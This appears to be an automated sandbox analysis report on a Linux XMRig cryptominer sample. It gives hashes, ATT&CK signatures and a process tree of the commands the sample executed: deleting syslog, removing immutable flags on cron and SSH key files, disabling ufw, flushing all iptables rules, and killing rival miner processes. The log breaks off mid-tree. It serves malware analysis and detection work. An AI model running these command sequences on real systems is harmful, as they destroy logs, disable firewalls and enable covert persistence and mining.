xmrig_linux | 44832ee8b46d8f32f5aaad9ee62e67a5b84af8516d0f8ef9f9052171b58ffa0e

General

Target

ae82d283c9d196bcc0b7b8539f40d6e8_JaffaCakes118
Size

30KB
MD5

ae82d283c9d196bcc0b7b8539f40d6e8
SHA1

3ba79f0318344ea58c233706be999f1f786ef1fc
SHA256

44832ee8b46d8f32f5aaad9ee62e67a5b84af8516d0f8ef9f9052171b58ffa0e
SHA512

5e7ae874850938c1467bd481f4f2e3daceeca74fca796572a4a5b488cb880de428b4cf77c8fb8eaebbb0866d0d55c95d5cbacf53023ad1ff02e1332393768510
SSDEEP

384:p7pQBDf6jlpTWg3vMGQiirhHwMyGj4CC9vEKMvU/4Qdre21jT58vKpG2Y0orcfKs:p78zQ5VFNcDAFLcIwgnoYq0xFBVdHtXn

Score

10^/10

xmrig_linux evasion miner persistence rootkit

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
evasion

Indicator Removal
T1070

Processes:

rm

description ioc process

File deleted /var/log/syslog rm
Flushes firewall rules 3 IoCs
Flushes/ disables firewall rules inside the Linux kernel.

Processes:

ufwiptables

pid process

1522 ufw
1694 iptables
3064
Loads a kernel module 1 IoCs
Loads a Linux kernel module, potentially to achieve persistence
rootkit

Processes:

modprobe

ioc pid process

/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko 1526 modprobe

description	ioc	process
File deleted	/var/log/syslog	rm

pid	process
1522	ufw
1694	iptables
3064

ioc	pid	process
/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko	1526	modprobe

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

iptablesxargsiptablesxargsxargsxargschattrip6tablesip6tablesxargsxargsxargsip6tablesxargsxargsxargsxargsiptablesxargsxargsxargsip6tablesxargsxargsiptablesxargsxargsip6tablesxargsip6tablesxargsiptablesxargsxargsxargsxargsxargsxargsxargsxargsip6tablesip6tablesxargs

pid	process
1555	iptables
2554	xargs
2559
2659
2631
2715
1567	iptables
1743	xargs
2154	xargs
2412	xargs
2627
1518	chattr
1651	ip6tables
1653	ip6tables
2997
2269	xargs
2377	xargs
2389	xargs
2661
1655	ip6tables
1776	xargs
2149	xargs
2460	xargs
2490	xargs
2985
1572	iptables
1731	xargs
1758	xargs
2039	xargs
2691
1622	ip6tables
1737	xargs
2133	xargs
2989
1599	iptables
2196	xargs
2515	xargs
3060
1616	ip6tables
2550	xargs
2590
1680	ip6tables
2044	xargs
2601
2709
1573	iptables
2171	xargs
2485	xargs
2703
1908	xargs
1994	xargs
2665
2713
3021
2671
1843	xargs
1954	xargs
2510	xargs
2535	xargs
2625
1621	ip6tables
1624	ip6tables
2226	xargs
2619

Creates/modifies Cron job 1 TTPs 41 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

Processes:

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.Qucbzf
File opened for modification	/var/spool/cron/crontabs/tmp.08ajMi
File opened for modification	/var/spool/cron/crontabs/tmp.hug3Kh
File opened for modification	/var/spool/cron/crontabs/tmp.766ssi
File opened for modification	/var/spool/cron/crontabs/tmp.xHV0Ij
File opened for modification	/var/spool/cron/crontabs/tmp.uHOK3j
File opened for modification	/var/spool/cron/crontabs/tmp.11XdHc
File opened for modification	/var/spool/cron/crontabs/tmp.H50wIe
File opened for modification	/var/spool/cron/crontabs/tmp.B3PPaf
File opened for modification	/var/spool/cron/crontabs/tmp.pIQNYh
File opened for modification	/var/spool/cron/crontabs/tmp.EFNOvk
File opened for modification	/var/spool/cron/crontabs/tmp.jolUXj
File opened for modification	/var/spool/cron/crontabs/tmp.1bVC1n
File opened for modification	/var/spool/cron/crontabs/tmp.9sf4G9
File opened for modification	/var/spool/cron/crontabs/tmp.8dGklc
File opened for modification	/var/spool/cron/crontabs/tmp.62QQhg
File opened for modification	/var/spool/cron/crontabs/tmp.lyJSbj
File opened for modification	/var/spool/cron/crontabs/tmp.abyLQh
File opened for modification	/var/spool/cron/crontabs/tmp.ok5X8g
File opened for modification	/var/spool/cron/crontabs/tmp.8CGAQj
File opened for modification	/var/spool/cron/crontabs/tmp.yY7qla
File opened for modification	/var/spool/cron/crontabs/tmp.OaPvOd
File opened for modification	/var/spool/cron/crontabs/tmp.hZa9Uc
File opened for modification	/var/spool/cron/crontabs/tmp.XSFOqk
File opened for modification	/var/spool/cron/crontabs/tmp.LN2eie
File opened for modification	/var/spool/cron/crontabs/tmp.rsV3Gg
File opened for modification	/var/spool/cron/crontabs/tmp.0T23Ne
File opened for modification	/var/spool/cron/crontabs/tmp.4eLvfj
File opened for modification	/var/spool/cron/crontabs/tmp.W7akyi
File opened for modification	/var/spool/cron/crontabs/tmp.rJ3xwh
File opened for modification	/var/spool/cron/crontabs/tmp.GOKrBh
File opened for modification	/var/spool/cron/crontabs/tmp.giP8dl
File opened for modification	/var/spool/cron/crontabs/tmp.U9tUVd
File opened for modification	/var/spool/cron/crontabs/tmp.uLOlLd
File opened for modification	/var/spool/cron/crontabs/tmp.IeGJ2c
File opened for modification	/var/spool/cron/crontabs/tmp.QUiXEl
File opened for modification	/var/spool/cron/crontabs/tmp.PuisQk
File opened for modification	/var/spool/cron/crontabs/tmp.h1cL8c
File opened for modification	/var/spool/cron/crontabs/tmp.9ekKgl
File opened for modification	/var/spool/cron/crontabs/tmp.PCXnMl
File opened for modification	/var/spool/cron/crontabs/tmp.kB3mJk

Disables AppArmor 28 IoCs
Disables AppArmor security module.

Processes:

pid process

3068
3043
3063
3069
3069
3043
3063
3068
3069
3069
3068
3080
3043
3043
3063
3063
3068
3068
3069
3043
3059
3063
3063
3078
3088
3043
3068
3069
Disables SELinux 1 IoCs
Disables SELinux security module.

Processes:

pid process

3042
Enumerates running processes
Discovers information about currently running processes on the system
Changes its process name 1 IoCs

Processes:

description ioc pid

Changes the process name, possibly in an attempt to hide itself (sysv-install) 3060

pid	process
3068
3043
3063
3069
3069
3043
3063
3068
3069
3069
3068
3080
3043
3043
3063
3063
3068
3068
3069
3043
3059
3063
3063
3078
3088
3043
3068
3069

pid	process
3042

description	ioc	pid
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	3060

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

T1082

Processes:

killpspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspsps

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery
T1082

Processes:

modprobe

description ioc process

File opened for reading /sys/module/ip6_tables/initstate modprobe
File opened for reading /sys/module/x_tables/initstate modprobe

description	ioc	process
File opened for reading	/sys/module/ip6_tables/initstate	modprobe
File opened for reading	/sys/module/x_tables/initstate	modprobe

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspkillpspspspspspsps

description	ioc	process
File opened for reading	/proc/211/status	ps
File opened for reading	/proc/1141/cmdline	ps
File opened for reading	/proc/323/cmdline	ps
File opened for reading	/proc/183/cmdline
File opened for reading	/proc/1511/cmdline
File opened for reading	/proc/1516/status	ps
File opened for reading	/proc/1178/status	ps
File opened for reading	/proc/10/cmdline	ps
File opened for reading	/proc/685/status
File opened for reading	/proc/177/stat
File opened for reading	/proc/1297/cmdline
File opened for reading	/proc/467/status
File opened for reading	/proc/1486/status
File opened for reading	/proc/993/status
File opened for reading	/proc/660/stat	ps
File opened for reading	/proc/495/status	ps
File opened for reading	/proc/1116/status	ps
File opened for reading	/proc/211/stat	ps
File opened for reading	/proc/29/status
File opened for reading	/proc/7/cmdline
File opened for reading	/proc/1107/cmdline
File opened for reading	/proc/1187/cmdline	ps
File opened for reading	/proc/1069/status	ps
File opened for reading	/proc/8/status	ps
File opened for reading	/proc/685/status
File opened for reading	/proc/1162/cmdline
File opened for reading	/proc/21/cmdline	ps
File opened for reading	/proc/1042/cmdline	ps
File opened for reading	/proc/36/cmdline	ps
File opened for reading	/proc/974/status	ps
File opened for reading	/proc/1143/cmdline	ps
File opened for reading	/proc/28/stat	ps
File opened for reading	/proc/167/stat	ps
File opened for reading	/proc/178/stat	ps
File opened for reading	/proc/137/stat	ps
File opened for reading	/proc/18/status
File opened for reading	/proc/181/status
File opened for reading	/proc/1036/status
File opened for reading	/proc/1235/status	ps
File opened for reading	/proc/1151/cmdline
File opened for reading	/proc/172/stat	ps
File opened for reading	/proc/1182/cmdline	ps
File opened for reading	/proc/26/status
File opened for reading	/proc/uptime	ps
File opened for reading	/proc/1183/status	ps
File opened for reading	/proc/1182/cmdline	ps
File opened for reading	/proc/80/stat	ps
File opened for reading	/proc/2138/stat	ps
File opened for reading	/proc/715/stat	ps
File opened for reading	/proc/495/status	ps
File opened for reading	/proc/1184/cmdline
File opened for reading	/proc/465/status	pkill
File opened for reading	/proc/589/stat	ps
File opened for reading	/proc/446/cmdline	ps
File opened for reading	/proc/34/status
File opened for reading	/proc/1137/cmdline
File opened for reading	/proc/211/cmdline	ps
File opened for reading	/proc/692/status	ps
File opened for reading	/proc/531/cmdline
File opened for reading	/proc/993/status	ps
File opened for reading	/proc/175/cmdline	ps
File opened for reading	/proc/1083/status	ps
File opened for reading	/proc/177/cmdline	ps
File opened for reading	/proc/179/status	ps

Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

ae82d283c9d196bcc0b7b8539f40d6e8_JaffaCakes118

description ioc process

File opened for modification /tmp/log_rot ae82d283c9d196bcc0b7b8539f40d6e8_JaffaCakes118

description	ioc	process
File opened for modification	/tmp/log_rot	ae82d283c9d196bcc0b7b8539f40d6e8_JaffaCakes118

/tmp/ae82d283c9d196bcc0b7b8539f40d6e8_JaffaCakes118
/tmp/ae82d283c9d196bcc0b7b8539f40d6e8_JaffaCakes118
1⤵
- Writes file to tmp directory
PID:1516

/bin/rm
rm -rf /var/log/syslog
2⤵
- Deletes system logs
PID:1517

/usr/bin/chattr
chattr -iua /tmp/
2⤵
- Attempts to change immutable files
PID:1518

/usr/bin/chattr
chattr -iua /var/tmp/
2⤵
PID:1519

/usr/bin/chattr
chattr -R -i /var/spool/cron
2⤵
PID:1520

/usr/bin/chattr
chattr -i /etc/crontab
2⤵
PID:1521

/usr/sbin/ufw
ufw disable
2⤵
- Flushes firewall rules
PID:1522

/sbin/iptables
/sbin/iptables -V
3⤵
PID:1523

/lib/ufw/ufw-init
/lib/ufw/ufw-init force-stop
3⤵
PID:1524

/sbin/ip6tables
ip6tables -L INPUT -n
4⤵
PID:1525

/sbin/modprobe
/sbin/modprobe ip6_tables
5⤵
- Loads a kernel module
- Enumerates kernel/hardware configuration
PID:1526

/sbin/iptables
iptables -F ufw-logging-deny
4⤵
PID:1530

/sbin/iptables
iptables -F ufw-logging-allow
4⤵
PID:1533

/sbin/iptables
iptables -F ufw-not-local
4⤵
PID:1534

/sbin/iptables
iptables -F ufw-user-logging-input
4⤵
PID:1535

/sbin/iptables
iptables -F ufw-user-limit-accept
4⤵
PID:1536

/sbin/iptables
iptables -F ufw-user-limit
4⤵
PID:1537

/sbin/iptables
iptables -F ufw-skip-to-policy-input
4⤵
PID:1538

/sbin/iptables
iptables -F ufw-reject-input
4⤵
PID:1539

/sbin/iptables
iptables -F ufw-after-logging-input
4⤵
PID:1540

/sbin/iptables
iptables -F ufw-after-input
4⤵
PID:1541

/sbin/iptables
iptables -F ufw-user-input
4⤵
PID:1542

/sbin/iptables
iptables -F ufw-before-input
4⤵
PID:1543

/sbin/iptables
iptables -F ufw-before-logging-input
4⤵
PID:1544

/sbin/iptables
iptables -F ufw-skip-to-policy-forward
4⤵
PID:1545

/sbin/iptables
iptables -F ufw-reject-forward
4⤵
PID:1546

/sbin/iptables
iptables -F ufw-after-logging-forward
4⤵
PID:1547

/sbin/iptables
iptables -F ufw-after-forward
4⤵
PID:1548

/sbin/iptables
iptables -F ufw-user-logging-forward
4⤵
PID:1549

/sbin/iptables
iptables -F ufw-user-forward
4⤵
PID:1550

/sbin/iptables
iptables -F ufw-before-forward
4⤵
PID:1551

/sbin/iptables
iptables -F ufw-before-logging-forward
4⤵
PID:1552

/sbin/iptables
iptables -F ufw-track-forward
4⤵
PID:1553

/sbin/iptables
iptables -F ufw-track-output
4⤵
PID:1554

/sbin/iptables
iptables -F ufw-track-input
4⤵
- Attempts to change immutable files
PID:1555

/sbin/iptables
iptables -F ufw-skip-to-policy-output
4⤵
PID:1556

/sbin/iptables
iptables -F ufw-reject-output
4⤵
PID:1557

/sbin/iptables
iptables -F ufw-after-logging-output
4⤵
PID:1558

/sbin/iptables
iptables -F ufw-after-output
4⤵
PID:1559

/sbin/iptables
iptables -F ufw-user-logging-output
4⤵
PID:1560

/sbin/iptables
iptables -F ufw-user-output
4⤵
PID:1561

/sbin/iptables
iptables -F ufw-before-output
4⤵
PID:1562

/sbin/iptables
iptables -F ufw-before-logging-output
4⤵
PID:1563

/sbin/iptables
iptables -Z ufw-logging-deny
4⤵
PID:1564

/sbin/iptables
iptables -Z ufw-logging-allow
4⤵
PID:1565

/sbin/iptables
iptables -Z ufw-not-local
4⤵
PID:1566

/sbin/iptables
iptables -Z ufw-user-logging-input
4⤵
- Attempts to change immutable files
PID:1567

/sbin/iptables
iptables -Z ufw-user-limit-accept
4⤵
PID:1568

/sbin/iptables
iptables -Z ufw-user-limit
4⤵
PID:1569

/sbin/iptables
iptables -Z ufw-skip-to-policy-input
4⤵
PID:1570

/sbin/iptables
iptables -Z ufw-reject-input
4⤵
PID:1571

/sbin/iptables
iptables -Z ufw-after-logging-input
4⤵
- Attempts to change immutable files
PID:1572

/sbin/iptables
iptables -Z ufw-after-input
4⤵
- Attempts to change immutable files
PID:1573

/sbin/iptables
iptables -Z ufw-user-input
4⤵
PID:1574

/sbin/iptables
iptables -Z ufw-before-input
4⤵
PID:1575

/sbin/iptables
iptables -Z ufw-before-logging-input
4⤵
PID:1576

/sbin/iptables
iptables -Z ufw-skip-to-policy-forward
4⤵
PID:1577

/sbin/iptables
iptables -Z ufw-reject-forward
4⤵
PID:1578

/sbin/iptables
iptables -Z ufw-after-logging-forward
4⤵
PID:1579

/sbin/iptables
iptables -Z ufw-after-forward
4⤵
PID:1580

/sbin/iptables
iptables -Z ufw-user-logging-forward
4⤵
PID:1581

/sbin/iptables
iptables -Z ufw-user-forward
4⤵
PID:1582

/sbin/iptables
iptables -Z ufw-before-forward
4⤵
PID:1583

/sbin/iptables
iptables -Z ufw-before-logging-forward
4⤵
PID:1584

/sbin/iptables
iptables -Z ufw-track-forward
4⤵
PID:1585

/sbin/iptables
iptables -Z ufw-track-output
4⤵
PID:1586

/sbin/iptables
iptables -Z ufw-track-input
4⤵
PID:1587

/sbin/iptables
iptables -Z ufw-skip-to-policy-output
4⤵
PID:1588

/sbin/iptables
iptables -Z ufw-reject-output
4⤵
PID:1589

/sbin/iptables
iptables -Z ufw-after-logging-output
4⤵
PID:1590

/sbin/iptables
iptables -Z ufw-after-output
4⤵
PID:1591

/sbin/iptables
iptables -Z ufw-user-logging-output
4⤵
PID:1592

/sbin/iptables
iptables -Z ufw-user-output
4⤵
PID:1593

/sbin/iptables
iptables -Z ufw-before-output
4⤵
PID:1594

/sbin/iptables
iptables -Z ufw-before-logging-output
4⤵
PID:1595

/sbin/iptables
iptables -X ufw-logging-deny
4⤵
PID:1596

/sbin/iptables
iptables -X ufw-logging-allow
4⤵
PID:1597

/sbin/iptables
iptables -X ufw-not-local
4⤵
PID:1598

/sbin/iptables
iptables -X ufw-user-logging-input
4⤵
- Attempts to change immutable files
PID:1599

/sbin/iptables
iptables -X ufw-user-logging-output
4⤵
PID:1600

/sbin/iptables
iptables -X ufw-user-logging-forward
4⤵
PID:1601

/sbin/iptables
iptables -X ufw-user-limit-accept
4⤵
PID:1602

/sbin/iptables
iptables -X ufw-user-limit
4⤵
PID:1603

/sbin/iptables
iptables -X ufw-user-input
4⤵
PID:1604

/sbin/iptables
iptables -X ufw-user-forward
4⤵
PID:1605

/sbin/iptables
iptables -X ufw-user-output
4⤵
PID:1606

/sbin/iptables
iptables -X ufw-skip-to-policy-input
4⤵
PID:1607

/sbin/iptables
iptables -X ufw-skip-to-policy-output
4⤵
PID:1608

/sbin/iptables
iptables -X ufw-skip-to-policy-forward
4⤵
PID:1609

/sbin/iptables
iptables -P INPUT ACCEPT
4⤵
PID:1610

/sbin/iptables
iptables -P OUTPUT ACCEPT
4⤵
PID:1611

/sbin/iptables
iptables -P FORWARD ACCEPT
4⤵
PID:1612

/sbin/ip6tables
ip6tables -F ufw6-logging-deny
4⤵
PID:1613

/sbin/ip6tables
ip6tables -F ufw6-logging-allow
4⤵
PID:1614

/sbin/ip6tables
ip6tables -F ufw6-not-local
4⤵
PID:1615

/sbin/ip6tables
ip6tables -F ufw6-user-logging-input
4⤵
- Attempts to change immutable files
PID:1616

/sbin/ip6tables
ip6tables -F ufw6-user-limit-accept
4⤵
PID:1617

/sbin/ip6tables
ip6tables -F ufw6-user-limit
4⤵
PID:1618

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-input
4⤵
PID:1619

/sbin/ip6tables
ip6tables -F ufw6-reject-input
4⤵
PID:1620

/sbin/ip6tables
ip6tables -F ufw6-after-logging-input
4⤵
- Attempts to change immutable files
PID:1621

/sbin/ip6tables
ip6tables -F ufw6-after-input
4⤵
- Attempts to change immutable files
PID:1622

/sbin/ip6tables
ip6tables -F ufw6-user-input
4⤵
PID:1623

/sbin/ip6tables
ip6tables -F ufw6-before-input
4⤵
- Attempts to change immutable files
PID:1624

/sbin/ip6tables
ip6tables -F ufw6-before-logging-input
4⤵
PID:1625

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-forward
4⤵
PID:1626

/sbin/ip6tables
ip6tables -F ufw6-reject-forward
4⤵
PID:1627

/sbin/ip6tables
ip6tables -F ufw6-after-logging-forward
4⤵
PID:1628

/sbin/ip6tables
ip6tables -F ufw6-after-forward
4⤵
PID:1629

/sbin/ip6tables
ip6tables -F ufw6-user-logging-forward
4⤵
PID:1630

/sbin/ip6tables
ip6tables -F ufw6-user-forward
4⤵
PID:1631

/sbin/ip6tables
ip6tables -F ufw6-before-forward
4⤵
PID:1632

/sbin/ip6tables
ip6tables -F ufw6-before-logging-forward
4⤵
PID:1633

/sbin/ip6tables
ip6tables -F ufw6-track-forward
4⤵
PID:1634

/sbin/ip6tables
ip6tables -F ufw6-track-output
4⤵
PID:1635

/sbin/ip6tables
ip6tables -F ufw6-track-input
4⤵
PID:1636

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-output
4⤵
PID:1637

/sbin/ip6tables
ip6tables -F ufw6-reject-output
4⤵
PID:1638

/sbin/ip6tables
ip6tables -F ufw6-after-logging-output
4⤵
PID:1639

/sbin/ip6tables
ip6tables -F ufw6-after-output
4⤵
PID:1640

/sbin/ip6tables
ip6tables -F ufw6-user-logging-output
4⤵
PID:1641

/sbin/ip6tables
ip6tables -F ufw6-user-output
4⤵
PID:1642

/sbin/ip6tables
ip6tables -F ufw6-before-output
4⤵
PID:1643

/sbin/ip6tables
ip6tables -F ufw6-before-logging-output
4⤵
PID:1644

/sbin/ip6tables
ip6tables -Z ufw6-logging-deny
4⤵
PID:1645

/sbin/ip6tables
ip6tables -Z ufw6-logging-allow
4⤵
PID:1646

/sbin/ip6tables
ip6tables -Z ufw6-not-local
4⤵
PID:1647

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-input
4⤵
PID:1648

/sbin/ip6tables
ip6tables -Z ufw6-user-limit-accept
4⤵
PID:1649

/sbin/ip6tables
ip6tables -Z ufw6-user-limit
4⤵
PID:1650

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-input
4⤵
- Attempts to change immutable files
PID:1651

/sbin/ip6tables
ip6tables -Z ufw6-reject-input
4⤵
PID:1652

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-input
4⤵
- Attempts to change immutable files
PID:1653

/sbin/ip6tables
ip6tables -Z ufw6-after-input
4⤵
PID:1654

/sbin/ip6tables
ip6tables -Z ufw6-user-input
4⤵
- Attempts to change immutable files
PID:1655

/sbin/ip6tables
ip6tables -Z ufw6-before-input
4⤵
PID:1656

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-input
4⤵
PID:1657

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-forward
4⤵
PID:1658

/sbin/ip6tables
ip6tables -Z ufw6-reject-forward
4⤵
PID:1659

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-forward
4⤵
PID:1660

/sbin/ip6tables
ip6tables -Z ufw6-after-forward
4⤵
PID:1661

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-forward
4⤵
PID:1662

/sbin/ip6tables
ip6tables -Z ufw6-user-forward
4⤵
PID:1663

/sbin/ip6tables
ip6tables -Z ufw6-before-forward
4⤵
PID:1664

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-forward
4⤵
PID:1665

/sbin/ip6tables
ip6tables -Z ufw6-track-forward
4⤵
PID:1666

/sbin/ip6tables
ip6tables -Z ufw6-track-output
4⤵
PID:1667

/sbin/ip6tables
ip6tables -Z ufw6-track-input
4⤵
PID:1668

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-output
4⤵
PID:1669

/sbin/ip6tables
ip6tables -Z ufw6-reject-output
4⤵
PID:1670

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-output
4⤵
PID:1671

/sbin/ip6tables
ip6tables -Z ufw6-after-output
4⤵
PID:1672

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-output
4⤵
PID:1673

/sbin/ip6tables
ip6tables -Z ufw6-user-output
4⤵
PID:1674

/sbin/ip6tables
ip6tables -Z ufw6-before-output
4⤵
PID:1675

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-output
4⤵
PID:1676

/sbin/ip6tables
ip6tables -X ufw6-logging-deny
4⤵
PID:1677

/sbin/ip6tables
ip6tables -X ufw6-logging-allow
4⤵
PID:1678

/sbin/ip6tables
ip6tables -X ufw6-not-local
4⤵
PID:1679

/sbin/ip6tables
ip6tables -X ufw6-user-logging-input
4⤵
- Attempts to change immutable files
PID:1680

/sbin/ip6tables
ip6tables -X ufw6-user-logging-output
4⤵
PID:1681

/sbin/ip6tables
ip6tables -X ufw6-user-logging-forward
4⤵
PID:1682

/sbin/ip6tables
ip6tables -X ufw6-user-limit-accept
4⤵
PID:1683

/sbin/ip6tables
ip6tables -X ufw6-user-limit
4⤵
PID:1684

/sbin/ip6tables
ip6tables -X ufw6-user-input
4⤵
PID:1685

/sbin/ip6tables
ip6tables -X ufw6-user-forward
4⤵
PID:1686

/sbin/ip6tables
ip6tables -X ufw6-user-output
4⤵
PID:1687

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-input
4⤵
PID:1688

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-output
4⤵
PID:1689

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-forward
4⤵
PID:1690

/sbin/ip6tables
ip6tables -P INPUT ACCEPT
4⤵
PID:1691

/sbin/ip6tables
ip6tables -P OUTPUT ACCEPT
4⤵
PID:1692

/sbin/ip6tables
ip6tables -P FORWARD ACCEPT
4⤵
PID:1693

/sbin/iptables
iptables -F
2⤵
- Flushes firewall rules
PID:1694

/usr/bin/sudo
sudo sysctl "kernel.nmi_watchdog=0"
2⤵
PID:1695

/usr/sbin/userdel
userdel akay
2⤵
PID:1699

/usr/sbin/userdel
userdel vfinder
2⤵
PID:1700

/usr/bin/chattr
chattr -iae /root/.ssh/
2⤵
PID:1707

/usr/bin/chattr
chattr -iae /root/.ssh/authorized_keys
2⤵
PID:1708

/bin/rm
rm -rf "/tmp/addres*"
2⤵
PID:1709

/bin/rm
rm -rf "/tmp/walle*"
2⤵
PID:1710

/bin/rm
rm -rf /tmp/keys
2⤵
PID:1711

/bin/grep
grep -i "[a]liyun"
2⤵
PID:1713

/bin/ps
ps aux
2⤵
PID:1712

/bin/grep
grep -i "[y]unjing"
2⤵
PID:1715

/bin/ps
ps aux
2⤵
PID:1714

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1720

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1719

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1718

/bin/grep
grep 185.71.65.238
2⤵
PID:1717

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1725

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1724

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1723

/bin/grep
grep 140.82.52.87
2⤵
PID:1722

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1731

/bin/grep
grep -v -
2⤵
PID:1730

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1729

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1728

/bin/grep
grep :143
2⤵
PID:1727

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1737

/bin/grep
grep -v -
2⤵
PID:1736

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1735

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1734

/bin/grep
grep :2222
2⤵
PID:1733

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1743

/bin/grep
grep -v -
2⤵
PID:1742

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1741

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1740

/bin/grep
grep :3333
2⤵
PID:1739

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1749

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1747

/bin/grep
grep -v -
2⤵
PID:1748

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1746

/bin/grep
grep :3389
2⤵
PID:1745

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1758

/bin/grep
grep -v -
2⤵
PID:1757

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1756

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1755

/bin/grep
grep :4444
2⤵
PID:1754

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1764

/bin/grep
grep -v -
2⤵
PID:1763

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1762

